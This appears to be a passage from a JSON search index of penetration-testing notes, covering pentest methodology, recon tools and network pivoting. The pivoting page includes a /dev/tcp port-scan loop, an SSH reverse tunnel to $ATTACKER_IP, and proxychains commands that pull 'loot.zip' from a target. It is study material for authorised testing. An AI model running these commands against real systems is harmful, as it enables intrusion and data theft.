2 lines
415 KiB
JSON
2 lines
415 KiB
JSON
|
{"index":[{"content":"Pentesting* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)\nAuthorized audit of security systems of computers and networks.\n* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)\n * Permissions\n * Engagement --> internal/external pentest or adversary emulation of APTs\n * Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS\n * Rules\n* NDA\n\n## Campaign\n* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)\n* [vectr.io](https://vectr.io)\n\n* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines\n* Operations --> Operators, Known Information, Responsibilities\n* Mission --> Exact commands to run and execution time of the engagement\n* Remediation --> Report, Remediation consultation\n\n## Methodology\n\n* Steps\n * Reconnaissance\n * Enumeration/Scanning\n * Gaining Access\n * Privilege Escalation\n * Covering Tracks\n * Reporting\n\n### Reconnaissance\n* Duck / SearX / metacrawler / google\n* Wikipedia\n* [Shodan.io](http://www.shodan.io)\n* PeopleFinder.com\n* who.is\n* sublist3r\n* hunter.io\n* builtwith.com\n* wappalyzer\n\n### Enumeration\n* nmap\n* nikto\n* gobuster\n* dirbuster\n* metasploit\n* enum4linux / linpeas / winpeas / linenum\n\n### Exploitation\n\n### Post Exploitation\n* Pivoting\n#### Privilege Escalation\n* Vertically or horizontally\n\n#### Covering Tracks\n\n#### Reporting\n* Includes\n * Vulnerabilities\n * Criticality\n * Description\n * Countermeasures \n * Finding summary\n\n## Frameworks\n* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)\n* [NIST](https://www.nist.gov/cyberframework)\n* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)\n\n## Testing Webapps\n\n* Two methods\n1. Every Page and its functions one by one\n2. Test by stages \n * Authorization\n * Authentication\n * Injection\n * Client Side Controls\n * Application Logic\n","description":"","tags":[],"title":"Pentesting","uri":"/README.html"},{"content":"Pivoting\n* Tunnelling/Proxying\n* Port Forwarding\n\n## Enumeration \n### Using material found on the machine and preinstalled tools\n* `arp -a`\n* `/etc/hosts` or `C:\\Windows\\System32\\drivers\\etc\\hosts`\n* `/etc/resolv.conf`\n* `ipconfig /all`\n* `nmcli dev show`\n* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)\n\n### Scripting Techniques\n```sh\nfor i in {1..255}; do (ping -c 1 192.168.0.${1} | grep \"bytes from\" &); done\nfor i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done\n```\n* Using local tools through a proxy like `nmap`\n\n## Tools\n\n* Enumerating a network using native and statically compiled tools\n\n### Proxychains / FoxyProxy\n\n* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains\n ```sh\n ssh <username>@$ATTACKER_IP -R 9050 -N\n ```\n* Proxychains, e.g. scan target via nmap, or connect via nc through jump server\n ```sh\n proxychains nc <IP> <PORT>\n proychains nmap <IP>\n proxychains ssh user@$TARGET_IP\n proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS\n proxychains wget http://$TARGET_IP:8000/loot.zip\n ```\n * Use `/etc/proxychains.conf` or `./proxychains.conf`containing:\n ```sh\n [ProxyList]\n # add proxy here ...\n # meanwhile\n # defaults set to \"tor\"\n socks4 127.0.0.1 9050\n #socks5 127.0.0.1 1337\n # proxy_dns\n ``` \n* FoxyProxy, choose proxy type, proxy IP and port in settings \n\n### SSH port forwarding and tunnelling (primarily Unix)\n\n* LocalPortForwarding\n ```sh\n ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN\n ```\n * Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`.
|